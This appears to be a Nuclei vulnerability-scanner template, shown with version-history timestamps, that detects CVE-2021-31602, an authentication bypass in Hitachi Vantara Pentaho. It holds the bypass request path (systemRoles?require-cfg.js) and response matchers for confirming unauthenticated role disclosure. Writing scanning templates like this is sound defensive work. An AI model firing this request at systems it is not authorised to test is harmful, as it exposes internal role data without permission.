2021-11-11 05:49:57 +00:00
id : CVE-2021-31602
info :
2022-07-26 13:45:11 +00:00
name : Hitachi Vantara Pentaho/Business Intelligence Server - Authentication Bypass
2021-11-11 05:49:57 +00:00
author : pussycat0x
severity : high
2022-07-26 13:45:11 +00:00
description : Hitachi Vantara Pentaho through 9.1 and Pentaho Business Intelligence Server through 7.x are vulnerable to authentication bypass. The Security Model has different layers of Access Control. One of these layers is the applicationContext security, which is defined in the applicationContext-spring-security.xml file. The default configuration allows an unauthenticated user with no previous knowledge of the platform settings to extract pieces of information without possessing valid credentials.
2023-09-06 12:09:01 +00:00
remediation : |
Apply the latest security patches or updates provided by Hitachi Vantara to fix the authentication bypass vulnerability.
2021-11-11 05:49:57 +00:00
reference :
- https://seclists.org/fulldisclosure/2021/Nov/13
- https://portswigger.net/daily-swig/remote-code-execution-sql-injection-bugs-uncovered-in-pentaho-business-analytics-software
- https://hawsec.com/publications/pentaho/HVPENT210401-Pentaho-BA-Security-Assessment-Report-v1_1.pdf
2022-05-17 09:18:12 +00:00
- https://www.hitachi.com/hirt/security/index.html
2022-07-26 13:45:11 +00:00
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31602
2021-11-11 05:29:39 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 7.5
2021-11-11 05:29:39 +00:00
cve-id : CVE-2021-31602
2023-07-11 19:49:27 +00:00
cwe-id : CWE-287
epss-score : 0.39689
2023-08-31 11:46:18 +00:00
epss-percentile : 0.96761
2023-09-06 12:09:01 +00:00
cpe : cpe:2.3:a:hitachi:vantara_pentaho:*:*:*:*:*:*:*:*
2022-04-22 10:38:41 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 2
2023-07-11 19:49:27 +00:00
vendor : hitachi
product : vantara_pentaho
2023-09-06 12:09:01 +00:00
shodan-query : Pentaho
2022-08-27 04:41:18 +00:00
tags : spring,seclists,cve,cve2021,pentaho,auth-bypass
2021-11-11 05:49:57 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-11-11 05:49:57 +00:00
- method : GET
path :
- "{{BaseURL}}/pentaho/api/userrolelist/systemRoles?require-cfg.js"
- "{{BaseURL}}/api/userrolelist/systemRoles?require-cfg.js"
stop-at-first-match : true
2023-07-11 19:49:27 +00:00
2021-11-11 05:49:57 +00:00
matchers-condition : and
matchers :
- type : word
part : body
words :
- '<roleList>'
- '<roles>Anonymous</roles>'
condition : and
- type : status
status :
2022-01-04 19:34:16 +00:00
- 200